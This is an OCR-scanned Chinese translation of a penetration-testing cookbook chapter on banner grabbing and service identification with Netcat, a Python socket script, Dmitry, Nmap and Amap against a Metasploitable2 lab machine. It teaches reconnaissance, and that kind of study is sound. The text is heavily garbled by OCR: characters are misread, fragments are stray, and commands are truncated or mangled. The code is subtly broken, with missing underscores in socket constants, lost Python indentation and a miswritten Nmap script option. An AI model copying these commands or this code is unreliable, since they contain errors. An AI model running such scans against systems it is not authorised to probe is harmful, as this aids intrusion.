本 通常 是 漏洞 的 关键 指示 ， 这 可 以 用 于 利用 或 者 入 侵 系 统 。 


工作 原理 


Netcat 能 够 住 区 这 些 服 务 的 特征 ， 因 为 当 客 户 端 设 备 连 接 它们 的 时 候 ， 服 务 的 配置 
会 自己 开房 这 些 信息 。 自 我 开房 服务 的 和 版 本 的 最 佳 实践 在 过 去 常常 使 用 ， 来 确保 
客户 端 俩 连接 到 了 它们 想 连 接 的 目标 。 由 于 开发 者 的 安全 意识 变 强 ， 这 个 实践 变 得 
越 来 越 不 普遍 。 无 论 如 何 ， 它 仍旧 对 于 不 良 开 发 者 ， 或 者 历史 遗留 服务 十 分 普遍 ， 
它们 会 以 服务 特征 的 形式 提供 大 量 信 息 。 


4.2 Python 套 接 字 特 征 抓 取 


Python 的 套 接 字 模块 可 以 用 于 连接 运行 在 远程 端口 上 的 网 络 服务 。 这 个 秘籍 展示 人 馈 
了 如 何 使 用 Python 套 接 字 来 获取 服务 特征 ， 以 便 识别 目标 系统 上 和 开放 端口 相关 
的 服务 。 


准备 


为 了 使 用 Python 套 接 字 收 集 服务 特征 ， 在 客户 端 设备 连接 时 ， 你 需要 拥有 运行 开 
放 信 息 的 网 络 服 务 的 远程 系统 。 提 供 的 例子 使 用 了 Metasploitable2 来 执行 这 个 任 
务 。 配 置 Metasploitable2 的 更 多 信息 ， 请 参考 第 一 章 的 “安装 Metasploitable2": 


f 


此 外 ， 这 一 节 也 需要 编写 脚本 的 更 多 信息 ， 请 参考 第 一 章 中 的 “使 用 文本 编辑 器 VIM 
和 Nano" ° 


操作 步骤 


使 用 Python 交互 式 解 释 器 ， 我 们 可 以 直接 与 远程 网 络 设备 交互 。 你 可 以 通过 直接 
调用 Python 解释 器 来 直接 和 它 交 互 。 这 里 ， 你 可 以 导入 任何 打算 使 用 的 特定 模 
块 。 这 里 我 们 导入 套 接 字模 块 。 


root@KaliLinux:~# python 

Python 2.7.3 (default, Jan 2 2013, 16:53:07) 

[GCC 4.7.2] on linux2 

Type "help", "copyright", "credits" or "license" for more infor 
mation. 

>>> import socket 

>>> bangrab = socket.socket(socket.AF INET, socket.SOCK STREAM) 
>>> bangrab.connect(("172.16.36.135", 21)) 

>>> bangrab.recv(4096) '220 (vsFTPd 2.3.4)\r\n' 

>>> bangrab.close() 

>>> exit() 


在 提供 的 例子 中 ， 我 们 使 用 名 bangrab 创建 了 新 的 套 接 字 。 AF INET 参数 用 于 

表示 ， 套 接 字 使 用 IPv4 地 址 ， SOCK_STREAM 参数 用 于 表示 使 用 TCP 来 传输 。 一 
旦 套 接 字 创建 完毕 ， 可 以 使 用 connect 来 初始 化 连接 。 例 子 中 。 bangrab Bi 

字 和 连接 Metasploitable2 远程 主机 172.16.36.135 的 21 端口 。 连 接 

后 ，recv 函数 可 以 用 于 从 套 接 字 所 连接 的 服务 接收 内 容 。 假 设 有 可 用 信息 ， 它 会 
打印 它 作 为 输出 。 这 里 ， 我 们 可 以 看 到 由 运行 在 Metasploitable2 服务 器 上 的 FTP 

服务 提供 的 特征 。 最 后 ， close 函数 可 以 用 于 完全 结束 与 远程 服务 的 连接 。 如 果 

我 们 尝试 连接 不 接受 连接 的 服务 ，Python 解释 器 会 返回 错误 。 


root@KaliLinux:~# python 
Python 2.7.3 (default, Jan 2 2013, 16:53:07) 
[GCC 4.7.2] on linux2 
Type "help", "copyright", "credits" or "license" for more infor 
mation. 
>>> import socket 
>>> bangrab = socket.socket(socket.AF INET, socket.SOCK STREAM) 
>>> bangrab.connect(("172.16.36.135", 443)) 
Traceback (most recent call last): 
File "«stdin»", line 1, in «module» 
File "/usr/lib/python2.7/socket.py", line 224, in meth 
return getattr(self. sock,name)(*args) 
socket.error: [Errno 111] Connection refused 
>>> exit() 


如 果 我 们 尝试 连接 Metasploitable2 系统 上 的 TCP 443 端口 ， 会 返回 一 个 错误 ， 表 
示 连 接 被 拒绝 。 这 是 因为 这 个 远程 端口 上 没有 运行 服务 。 但 是 ， 即 使 当 存 在 服务 运 
行 在 目标 端口 时 ， 也 不 等 于 就 能 得 到 服务 的 特征 。 这 可 以 通过 与 Metasploitable2 
系统 的 TCP 80 端口 建立 连接 来 看 到 。 


root@KaliLinux:~# python 

Python 2.7.3 (default, Jan 2 2013, 16:53:07) 

[GCC 4.7.2] on linux2 

Type "help", "copyright", "credits" or "license" for more inform 
ation. 


>>> import socket 

>>> bangrab = socket.socket(socket.AF_INET, socket.SOCK STREAM) 
>>> bangrab.connect(("172.16.36.135", 80)) 

>>> bangrab.recv( 4096) 


运行 在 该 系统 80 端口 上 的 服务 接受 连接 ， 但 是 不 提供 服务 特征 给 连接 客户 端 。 如 
A recy 函数 被 调用 ， 但 是 不 提供 任何 数据 给 接受 者 ， 这 个 函数 会 被 阻塞 。 为 了 使 
用 Python 自动 化 收集 特征 ， 我 们 必须 使 用 替代 方案 来 识别 是 否 可 以 抓 取 到 特征 ， 
在 调用 这 个 函数 之 前 。 select 函数 为 这 个 问题 提供 了 便利 的 解决 方案 。 


root@KaliLinux:~# python 

Python 2.7.3 (default, Jan 2 2013, 16:53:07) 

[GCC 4.7.2] on linux2 

Type "help", "copyright", "credits" or "license" for more infor 
mation. 

>>> import socket 

>>> import select 

>>> bangrab = socket.socket(socket.AF INET, socket.SOCK STREAM) 
>>> bangrab.connect(("172.16.36.135", 80)) 

>>> ready = select.select([bangrab],[],[],1) 

>>> if ready[0]: 

: print bangrab.recv(4096) 

. else: 
: print "No Banner" 
. No Banner 


select 对 象 被 创建 ， 并 赋 给 了 变量 ready 。 这 个 对 象 被 传 入 了 4 个 参数 ， 包 括 
读 取 列 表 ， 写 入 列表 ， 弄 常 列表 ， 和 定义 超时 秒 数 的 整数 值 。 这 里 ， 我 们 仅仅 需要 
识别 套 接 字 什么 时 候 可 以 读 取 ， 所 以 第 二 个 和 第 三 个 参数 都 是 空 的 。 返 回 值 是 一 个 
数组 ， 对 应 三 个 列表 的 每 一 个 。 我 们 仅仅 对 bangrab 是 否 有 用 任何 可 读 内 容 感 兴 
趣 。 为 了 判断 是 否 是 这 样 ， 我 们 可 以 测试 数组 的 第 一 个 值 ， 并 且 如 果 值 讯 在 ， 我 们 
可 以 从 套 接 字 中 接受 内 容 。 整 个 过 程 可 以 使 用 Python 可 执行 脚本 来 自动 化 : 


#!/usr/bin/python 


import socket 
import select 
import sys 


if len(sys.argv) != 4: 

print "Usage - ./banner_grab.py [Target-IP] [First Port] [La 
st Port |" 

print "Example - ./banner_grab.py 10.0.0.5 1 100" 

print "Example will grab banners for TCP ports 1 through 100 
on 10.0.0.5" 

sys.exit() 


ip = sys.argv[1] 
start = int(sys.argv[2]) 
end = int(sys.argv[3]) 
for port in range(start,end): 
try: 
bangrab = socket.socket(socket.AF INET, socket.SOCK STREAM) 


bangrab.connect((ip, port)) 
ready = select.select([bangrab],[],[],1) 
if ready[0]: 
print "TCP Port " + str(port) + " - " + bangrab.recv(409 
6) 
bangrab.close() 
except: 
pass 


在 提供 的 脚本 中 ， 三 个 参数 作为 输入 接受 。 第 一 个 参数 包含 用 于 测试 服务 特征 的 IP 
地 址 。 第 二 个 参数 指明 了 被 扫描 的 端口 范围 的 第 一 个 端口 ， 第 三 个 和 最 后 一 个 参数 
指明 了 最 后 一 个 端口 。 执 行 过 程 中 ， 这 个 脚本 会 使 用 Python 套 接 字 来 连接 所 有 远 
程 系统 的 范围 内 的 端口 值 。 并 且 会 收集 和 打印 所 有 识别 出 的 服务 特征 。 这 个 脚本 可 
以 通过 修改 文件 权限 之 后 直接 从 所 在 目录 中 调用 来 执行 : 


root@KaliLinux:~# chmod 777 banner grab.py 
root@KaliLinux:~# ./banner grab.py 172.16.36.135 1 65535 


TCP Port 21 - 220 (vsFTPd 2.3.4) 
TCP Port 22 - SSH-2.0-OpenSSH 4.7p1 Debian-8ubuntui 


TCP Port 23 - ???? ??4??' 
TCP Port 25 - 220 metasploitable.localdomain ESMTP Postfix (Ubun 
tu) 


TCP Port 512 - Where are you? 


TCP Port 514 - 
TCP Port 1524 - root@metasploitable:/# 


TCP Port 2121 - 220 ProFTPD 1.3.1 Server (Debian) 
[::ffff:172.16.36.135] 


TCP Port 3306 - » 
5.0.51a-3ubuntu5?bo, (${c\, 4934JYb^4' fM 
TCP Port 5900 - RFB 003.003 


TCP Port 6667 - :irc.Metasploitable.LAN NOTICE AUTH :*** Looking 
up your hostname... 

:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your 
hostname; using your IP address instead 


TCP Port 6697 - :irc.Metasploitable.LAN NOTICE AUTH :*** Looking 
up your hostname... 


工作 原理 


这 个 秘籍 中 引入 的 Python 脚本 的 原理 是 使 用 套 接 字库 。 脚 本 遍历 每 个 指定 的 目标 
端口 地 址 ， 并 尝试 与 特定 端口 初始 化 TCP 连接。 如 果 建 立 了 连接 并 接受 到 来 自 目 
标 服 务 的 特征 ， 特 征 之 后 会 打印 在 脚本 的 输出 中 。 如 果 连 接 不 能 与 远程 端口 建立 ， 
脚本 之 后 会 移动 到 循环 汇总 的 下 一 个 端口 地 址 。 与 之 相似 ， 如 果 建 立 了 连接 ， 但 是 
没有 返回 任何 特征 ， 连 接 会 被 关闭 ， 并 且 和 脚本 会 继续 扫描 循环 内 的 下 一 个 值 。 


4.3 Dmitry 特征 抓 取 


Dmitry 是 个 简单 但 高 效 的 工具 ， 可 以 用 于 连接 运行 在 远程 端口 上 的 网 络 服务 。 这 个 
秘籍 真实 了 如 何 使 用 Dmitry 扫描 来 获取 服务 特征 ， 以 便 识 别 和 开放 端口 相关 的 服 


E 


准备 


为 了 使 用 Dmitry 收集 服务 特征 ， 在 客户 端 设备 连接 时 ， 你 
的 网 络 服务 的 远程 系统 。 提 供 E Metsplotables Ain he 
置 Metasploitable2 的 更 多 信息 ， 请 参考 第 一 章 的 “安装 Metasploitable2"$:4$ » 


工作 原理 


就 像 在 这 本 书 的 端口 扫描 秘籍 中 讨论 的 那样 Dmitry 可 以 用 于 对 150 个 常用 服务 的 端 
口 执行 快速 的 TCP 端口 扫描 。 这 可 以 使 用 -p 选项 来 执行 : 


root@KaliLinux:~# dmitry -p 172.16.36.135 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 


ERROR: Unable to locate Host Name for 172.16.36.135 
Continuing with limited modules 
HostIP:172.16.36.135 HostName: 


Gathered TCP Port information for 172.16.36.135 


Port State 
21/tcp open 
22/tcp open 
23/tcp open 
25/tcp open 
53/tcp open 
80/tcp open 
111/tcp open 
139/tcp open 


Portscan Finished: Scanned 150 ports, 141 ports were in state cl 
osed 


这 个 端口 扫描 选项 是 必须 的 ， 以 便 使 用 Dmitry 执行 特征 抓 取 。 x ei 
这 150 个 端口 时 ， 让 Dmitry 抓 取 任何 可 用 的 特征 。 这 可 以 使 用 -b 选项 和 -p 选 
项 来 完成 。 


root@KaliLinux:~# dmitry -pb 172.16.36.135 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 


ERROR: Unable to locate 
Host Name for 172.16.36.135 Continuing with limited modules 
HostIP:172.16.36.135 HostName: 


Gathered TCP Port information for 172.16.36.135 


Port State 
21/tcp open 
>> 220 (vsFTPd 2.3.4) 
22/tcp open 
>> SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 
23/tcp open 
>> 2222? 22#??' 
25/tcp open 
>> 220 metasploitable.localdomain ESMTP Postfix (Ubuntu) 
53/tcp open 
80/tcp open 
111/tcp open 
139/tcp open 


Portscan Finished: Scanned 150 ports, 141 ports were in state cl 
osed 


工作 原理 


Dmitry 是 个 非常 简单 的 命令 工具 ， 可 以 以 少量 开销 执行 特征 抓 取 任务 。 比 起 指定 需 

尝试 特征 抓 取 的 端口 ，Dmitry 可 以 自动 化 这 个 过 程 ， 通 过 仅仅 在 小 型 的 预定 义 和 
常用 端口 集合 中 尝试 特征 抓 取 。 来 自 运行 在 这 些 端口 地 址 的 特征 之 后 会 在 脚本 的 终 
端 输出 中 显示 。 


4.4 Nmap NSE 特征 抓 取 
Nmap 拥有 集成 的 Nmap 脚本 引擎 (NSE) ， 可 以 用 于 从 运行 在 远程 端口 的 网 络 服 


务 中 读 取 特征 。 这 个 秘籍 展示 了 如 何 使 用 Nmap NSE 来 获取 服务 特征 ， 以 便 识别 
与 目标 系统 的 开放 端口 相关 的 服务 。 


准备 


A eae Nmap NSE 收集 服务 特征 ， 在 客户 端 设 备 连 接 时 ， 你 需要 拥有 运行 开放 
言 息 的 网 络 服务 的 远程 系统 。 提 供 的 例子 使 用 了 Metasploitable2 来 执行 这 个 任 
。 配置 Metasploitable2 的 更 多 信息 ， 请 参考 第 一 章 的 “安装 Metasploitable2" 6: 


Mn 
oe 
o 


TE 3 


isi NSE 脚本 可 以 在 Nmap 中 使 用 --script 选项 ， 之 后 指定 脚本 名 称 来 调 
o 对 于 这 个 特定 的 脚本 ， 会 使 用 -sT 全 连接 扫描 ， 因 为 服务 特征 只 能 通过 建立 
oe 全 连接 在 收集 。 这 个 脚本 会 在 通过 Nmap 请 求 扫 描 的 相同 端口 上 使 用 。 


root@KaliLinux:~# nmap -sT 172.16.36.135 -p 22 --script-banner 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-19 04:56 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00036s latency). 

PORT STATE SERVICE 

22/tcp open ssh 

| banner: SSH-2.0-OpenSSH 4.7p1 Debian-8ubuntui 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds 


在 提供 的 例子 中 ， 扫 描 了 Metasploitable2 系统 的 端口 22。 除 了 表明 端口 打开 之 
外 ，Nmap 也 使 用 特征 脚本 来 收集 与 该 端口 相关 的 服务 特征 。 可 以 使 
用 --notation ， 在 端口 范围 内 使 用 相同 机 制 。 


root@KaliLinux:~# nmap -sT 172.16.36.135 -p 1-100 --script-banne 
E 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-19 04:56 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.0024s latency). 

Not shown: 94 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 

| banner: 220 (vsFTPd 2.3.4) 

22/tcp open ssh 

| banner: SSH-2.0-OpenSSH 4.7p1 Debian-8ubuntui 

23/tcp open telnet 

| banner: NxFFNXFDNX18NXFFNXFD. NXFFNXFDZNXFFNXFED ' 

25/tcp open smtp 

| banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu) 
53/tcp open domain 

80/tcp open http 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 10.26 seconds 


工作 原理 


另 一 个 用 于 执行 特征 抓 取 的 选择 就 是 使 用 Nmap NSE 脚本 。 这 可 以 以 两 种 方式 有 
效 简 化 信息 收集 过 程 : 首先 ， 由 于 Nmap 已 经 存在 于 你 的 工具 库 中 ， 经 常用 于 目标 
和 服务 探索 ; 其 次 ， 因 为 特征 抓 取 过 程 可 以 和 这 些 扫描 一 起 执行 。 带 有 附加 脚本 选 
项 和 特征 参数 的 TCP 连接 扫描 可 以 完成 服务 枚 举 和 特征 收集 的 任务 。 


4.5 Amap 特征 抓 取 


Amap 是 个 应 用 映射 工具 ， 可 以 用 于 从 运行 在 远程 端口 上 的 网 络 设 备 中 读 取 特征 。 
这 个 秘籍 展示 了 如 何 使 用 Amap 来 获取 服务 特征 ， 以 便 识别 和 目标 系统 上 的 开放 端 
口 相关 的 服务 。 


准备 


为 了 使 用 Amap 收集 服务 特征 ， 在 客户 端 设 备 连 接 时 ， 你 需要 拥有 运行 开放 信息 的 
网 络 服务 的 远程 系统 。 提 供 的 例子 使 用 了 Metasploitable2 来 执行 这 个 任务 。 配 置 
Metasploitable2 的 更 多 信息 ， 请 参考 第 一 章 的 “安装 Metasploitable2" $548 » 


操作 步骤 


Amap 中 的 -B 选项 可 以 用 于 以 特征 模式 运行 应 用 。 这 会 使 其 收集 特定 IP 地 址 和 
独舞 端口 的 特征 。Amap 可 以 通过 指定 远程 P 地址 和 服务 号 码 来 收集 单个 服务 的 特 
征 。 


root@KaliLinux:~# amap -B 172.16.36.135 21 
amap v5.4 (www.thc.org/thc-amap) started at 2013-12-19 05:04:58 
- BANNER mode 


Banner on 172.16.36.135:21/tcp : 220 (vsFTPd 2.3.4) Nr^n 


amap v5.4 finished at 2013-12-19 05:04:58 


这 个 例子 中 ，Amap 从 Metasploitable2 系统 172.16.36.135 的 21 端口 抓 取 了 服 
务 特征 。 这 个 命令 也 可 以 修改 来 扫描 端口 的 序列 范围 。 为 了 在 所 有 可 能 的 TCP 端 
口上 执行 扫描 ， 需 要 奥妙 所 有 可 能 的 端口 地 址 。 定 义 了 来 源 和 目标 端口 地 址 的 TCP 
头 部 部 分 是 16 位 长 ， 每 一 位 可 以 为 值 1 或 者 0。 所 以 一 共有 2 **16 或 65536 个 
TCP 端口 地 址 。 为 了 扫描 所 有 可 能 的 地 址 空间 ， 必 须 提 供 1 到 65535 的 范围 。 


root@KaliLinux:~# amap -B 172.16.36.135 1-65535 
amap v5.4 (www.thc.org/thc-amap) started at 2014-01-24 15:54:28 
- BANNER mode 


Banner on 172.16.36.135:22/tcp : SSH-2.0-OpenSSH 4.7p1 Debian- 8 

Ubuntulxn 

Banner on 172.16.36.135:21/tcp : 220 (vsFTPd 2.3.4)\r\n 

Banner on 172.16.36.135:25/tcp : 220 metasploitable.localdomain 
ESMTP Postfix (Ubuntu)\r\n 

Banner on 172.16.36.135:23/tcp : #' 

Banner on 172.16.36.135:512/tcp : Where are you?\n 

Banner on 172.16.36.135:1524/tcp : root@metasploitable/# 

Banner on 172.16.36.135:2121/tcp : 220 ProFTPD 1.3.1 Server (De 

bian) [ffff172.16.36.135]\r\n 

Banner on 172.16.36.135:3306/tcp : >\n5.0.51a- 3ubuntu5dJ$t?xdj, 

FCYxm=) Q=~$5 

Banner on 172.16.36.135:5900/tcp : RFB 003.003\n 

Banner on 172.16.36.135:6667/tcp : irc.Metasploitable.LAN NOTICE 
AUTH *** Looking up your hostname...\r\n 

Banner on 172.16.36.135:6697/tcp : irc.Metasploitable.LAN NOTICE 
AUTH *** Looking up your hostname...\r\n 


amap v5.4 finished at 2014-01-24 15:54:35 


Amap 所 产生 的 标准 输出 提供 了 一 些 无 用 和 宛 余 的 信息 ， 可 以 从 输出 中 去 掉 。 尤 其 
是 ， 移 除 扫描 元 数据 ( Banner ) 以 及 在 整个 扫描 中 都 相同 的 IP 地 址 会 十 分 有 

用 。 为 了 移 除 扫描 元 数据 ， 我 们 必须 用 grep 搜索 输出 中 的 某 个 短语 ， 它 对 特定 输 
出 项 目 唯 一 ， 并 且 在 扫描 元 数据 中 不 存在 。 这 里 ， 我 们 可 以 grep 搜索 单词 on 。 


root@KaliLinux:~# amap -B 172.16.36.135 1-65535 | grep "on" 

Banner on 172.16.36.135:22/tcp : SSH-2.0-OpenSSH 4.7p1 Debian- 8 

ubuntudi^n 

Banner on 172.16.36.135:23/tcp : #' 

Banner on 172.16.36.135:21/tcp : 220 (vsFTPd 2.3.4) Nr^n 

Banner on 172.16.36.135:25/tcp : 220 metasploitable.localdomain 
ESMTP Postfix (Ubuntu)\r\n 

Banner on 172.16.36.135:512/tcp : Where are you?\n 

Banner on 172.16.36.135:1524/tcp : root@metasploitable/# 

Banner on 172.16.36.135:2121/tcp : 220 ProFTPD 1.3.1 Server (De 

bian) [ffff172.16.36.135]\r\n 

Banner on 172.16.36.135:3306/tcp : >\n5.0.51a- 3ubuntu5\tr>}{pDA 

Y, |$948[D-q«u[ 

Banner on 172.16.36.135:5900/tcp : RFB 003.003\n 

Banner on 172.16.36.135:6697/tcp : irc.Metasploitable.LAN NOTICE 
AUTH *** Looking up your hostname...\r\n 

Banner on 172.16.36.135:6667/tcp : irc.Metasploitable.LAN NOTICE 
AUTH *** Looking up your hostname...\r\n 


我 们 可 以 通过 使 用 冒号 分 隔 符 来 分 割 每 行 输出 ， 并 只 保留 字段 2 到 5， 
将 Banner on 短语 ， 以 及 重复 IP 地 址 从 输出 中 移 除 。 


root@KaliLinux:~# amap -B 172.16.36.135 1-65535 | grep "on" | cu 
mous Ma HN C S 

21/tcp : 220 (vsFTPd 2.3.4)\r\n 

22/tcp : SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\n 

1524/tcp : root@metasploitable/# 

25/tcp : 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)\r 
^n 

23 EG QS 

512/tcp : Where are you?\n 

2121/tcp : 220 ProFTPD 1.3.1 Server (Debian) [ffff172.16.36.135 
]\r\n 

3306/tcp : >\n5.0.51a-3ubuntu5\nqjAClvO(,v>q?&?J7qW>n 

5900/tcp : RFB 003.003\n 

6667/tcp : irc.Metasploitable.LAN NOTICE AUTH *** [ooking up you 
r hostname...\r\n 

6697/tcp : irc.Metasploitable.LAN NOTICE AUTH *** [ooking up you 
r hostname...\r\n 


工作 原理 


Amap 用 于 完成 特征 抓 取 任务 的 底层 原理 和 其 它 所 讨论 的 工具 一 样 。Amap 循环 遍 
历 目标 端口 地 址 的 列表 ， 尝 试 和 每 个 端口 建立 连接 ， 之 后 接收 任何 返回 的 通过 与 服 
务 之 间 的 连接 发 送 的 特征 。 


4.6 Nmap 服务 识别 


虽然 特征 抓 取 是 非 党 有利 的 信息 来 源 ， 服 务 特 征 中 的 版 本 发 现 越 来 越 不 重要 。 
Nmap 拥有 服务 识别 功能 ， 不 仅仅 是 简单 的 特征 抓 取 机 制 。 这 个 秘籍 展示 了 如 何 使 
用 Nmap 基于 探测 响应 的 分 析 执 行 服务 识别 。 


准备 


为 了 使 用 Nmap 执行 服务 识别 ， 你 需要 拥有 运行 可 被 探测 的 网 络 服务 的 远程 系统 。 
提供 的 例子 使 用 了 Metasploitable2 来 执行 这 个 任务 。 配 置 Metasploitable2 的 更 多 
信息 ， 请 参考 第 一 章 的 “安装 Metasploitable2” 秘 籍 。 


操作 步骤 


为 了 理解 Nmap 服务 是 被 功能 的 高 效 性 ， 我 们 应 该 考虑 不 提供 自我 开放 的 服务 特征 
的 服务 。 通 过 使 用 Netcat 连接 Metasploitable2 系统 的 TCP 80 端口 (这 个 技巧 在 
这 一 章 的 “Netcat 特征 抓 取 "秘籍 中 讨论 过 了 ) ， 我 们 可 以 看 到 ， 仅 仅 通过 建立 TCP 
连接 ， 不 能 得 到 任何 服务 特征 。 


root@KaliLinux:~# nc -nv 172.16.36.135 80 
(UNKNOWN) [172.16.36.135] 80 (http) open 
^C 


之 后 ， 为 了 在 相同 端口 上 执行 Nmap 扫描 ， 我 们 可 以 使 用 -sv 选项 ， 并 且 指 定 |P 


和 端口 。 


root@KaliLinux:~# nmap 172.16.36.135 -p 80 -sV 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-19 05:20 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00035s latency). 

PORT STATE SERVICE VERSION 

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Service detection performed. Please report any incorrect results 


at http://nmap.org/submit/ 
Nmap done: 1 IP address (1 host up) scanned in 6.18 seconds 


你 可 以 看 到 在 这 个 示例 中 ，Nmap 能 够 识别 该 服务 ， 厂 商 ， 以 及 产品 的 特定 版 本 。 
这 个 服务 识别 功能 也 可 以 用 于 对 特定 端口 列表 使 用 。 这 在 Nmap 中 并 不 需要 指定 端 
口 ，Nmap 会 扫描 1000 个 常用 端口 ， 并 且 尝 试 识别 所 有 识别 出 来 的 监听 服务 。 


root@KaliLinux:~# nmap 172.16.36.135 -sV 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-19 05:20 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00032s latency). 

Not shown: 977 closed ports 


PORT STATE SERVICE VERSION 

21/tcp open ftp vsftpd 2.3.4 

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protoc 
ol 2.0) 

23/tcp open telnet Linux telnetd 

25/tcp open smtp Postfix smtpd 

53/tcp open domain ISC BIND 9.4.2 

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 
111/tcp open rpcbind 2 (RPC #100000) 


139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP ) 


512/tcp open exec netkit-rsh rexecd 

513/tcp open login? 

514/tcp open tcpwrapped 

1099/tcp open rmiregistry GNU Classpath grmiregistry 
1524/tcp open ingreslock? 


2049/tcp open nfs 2-4 (RPC #100003) 

2121/tcp open ftp ProFTPD 1.3.1 

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 

5900/tcp open vnc VNC (protocol 3.3) 

6000/tcp open X11 (access denied) 

6667/tcp open irc Unreal ircd 

8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 

8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 M 


AC Address: 00:0C:29:3D:84:32 (VMware) 

Service Info: Hosts: metasploitable.localdomain, localhost, ir 
c.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux: linux 
_kernel 


Service detection performed. Please report any incorrect results 


at http://nmap.org/submit/ 
Nmap done: 1 IP address (1 host up) scanned in 161.49 seconds 


工作 原理 
Nmap 服务 识别 会 发 送 一 系列 复杂 的 探测 请 求 ， 之 后 分 析 这 些 请 求 的 响应 ， 尝 试 基 


于 服务 特定 的 签名 和 预期 行为 ? 来 识别 服务 o 此 外 9 你 可 以 看 到 Nmap 服务 识别 输 
出 的 底部 ，Nmap 依赖 于 用 户 的 反馈 ， 以 便 确 保 服务 签名 保持 可 靠 。 


4.7 Amap 服务 识别 


Amap Æ Nmap 的 近亲 ， 尤 其 为 识别 网 络 服务 而 设计 。 这 个 秘籍 中 ， 我 们 会 探索 如 
何 使 用 Amap 来 执行 服务 识别 。 


准备 


为 了 使 用 Amap 执行 服务 识别 ， 你 需要 拥有 运行 可 被 探测 的 网 络 服务 的 远程 系统 。 
提供 的 例子 使 用 了 Metasploitable2 来 执行 这 个 任务 。 配 置 Metasploitable2 的 更 多 
信息 ， 请 参考 第 一 章 的 “安装 Metasploitable2” 秘 籍 。 


操作 步骤 
为 了 在 单一 端口 上 执行 服务 识别 ， 以 特定 的 IP 地 址 和 端口 号 来 运行 Amap 。 


root@KaliLinux:~# amap 172.16.36.135 80 
amap v5.4 (www.thc.org/thc-amap) started at 2013-12-19 05:26:13 
- APPLICATION MAPPING mode 


Protocol on 172.16.36.135:80/tcp matches http 
Protocol on 172.16.36.135:80/tcp matches http-apache-2 


Unidentified ports: none. 


amap v5.4 finished at 2013-12-19 05:26:19 


Amap 也 可 以 使 用 破 折 号 记 法 扫描 端口 号 码 序列 。 为 了 这 样 你 工作 ， 以 特定 IP 地 址 
和 端口 范围 来 执行 amap ， 端 口 范围 由 范围 的 第 一 个 端口 号 ， 破 折 号 ， 和 范围 的 最 
后 一 个 端口 号 指定 。 


root@KaliLinux:~# amap 172.16.36.135 20-30 
amap v5.4 (www.thc.org/thc-amap) started at 2013-12-19 05:28:16 
- APPLICATION MAPPING mode 


Protocol on 172.16.36.135:25/tcp matches smtp 
Protocol on 172.16.36.135:21/tcp matches ftp 
Protocol on 172.16.36.135:25/tcp matches nntp 
Protocol on 172.16.36.135:22/tcp matches ssh 
Protocol on 172.16.36.135:22/tcp matches ssh-openssh 
Protocol on 172.16.36.135:23/tcp matches telnet 


Unidentified ports: 172.16.36.135:20/tcp 172.16.36.135:24/tcp 1 
72.16.36.135:26/tcp 172.16.36.135:27/tcp 172.16.36.135:28/tcp 1 
72.16.36.135:29/tcp 172.16.36.135:30/tcp (total 7). 


amap v5.4 finished at 2013-12-19 05:28:17 


除了 识别 任何 服务 ， 它 也 能 够 在 输出 末尾 生产 列表 ， 表 明 任 何 未 识别 的 端口 。 
列表 不 仅仅 包含 运行 不 能 识别 的 服务 的 开放 端口 ， 也 包含 所 有 扫描 过 的 关闭 端 


这 个 
u 


| 


但 是 这 个 输出 仅 在 扫描 了 10 个 端口 时 易于 管理 ， 当 扫描 更 多 端口 范围 之 后 会 变 得 
十 分 麻烦 。 为 了 去 掉 未 识别 端口 的 信息 ， 可 以 使 用 -q 选项 : 


root@KaliLinux:~# amap 172.16.36. 


amap v5.4 (www.thc.org/thc-amap) 
- APPLICATION MAPPING mode 


Protocol on 172.16 
Protocol on 172.16 
Protocol on 172.16 
Protocol on 172.16 
Protocol on 172.16 
Protocol on 172.16 
Protocol on 172.16 
Protocol on 172.16 
Protocol on 172.16 


amap v5.4 finished 


.36. 
.36 
.36. 
.36. 
.36. 
.36. 
.36. 
.36. 
.36. 


at 


135:21/tcp 


.135:25/tcp 


135:22/tcp 
135:22/tcp 
135:23/tcp 
135:80/tcp 
135:80/tcp 
135:25/tcp 
1352537 tcp 


2013-12-19 


135 1-100 -q 
started at 2013-12-19 05:29:27 


matches ftp 

matches smtp 

matches ssh 

matches ssh-openssh 
matches telnet 
matches http 

matches http-apache-2 
matches nntp 

matches dns 


05:29:39 


要 注意 ，Amap 会 指明 常规 匹配 和 更 加 特定 的 签名 。 在 这 个 例子 中 ， 运 行 在 端口 22 
的 服务 被 识别 为 匹配 SSH 签名 ， 也 匹配 更 加 有 具体 的 OpenSSH 签名 。 将 服务 签名 
和 服务 特征 展示 在 一 起 很 有 意义 。 特 征 可 以 使 用 -b 选项 ， 附 加 到 和 每 个 端口 相关 


的 信息 后 面 : 


root@KaliLinux:~# amap 172.16.36.135 1-100 -qb 
amap v5.4 (www.thc.org/thc-amap) started at 2013-12-19 05:32:11 
- APPLICATION MAPPING mode 


Protocol on 172.16.36.135:21/tcp matches ftp - banner: 220 (vsFT 
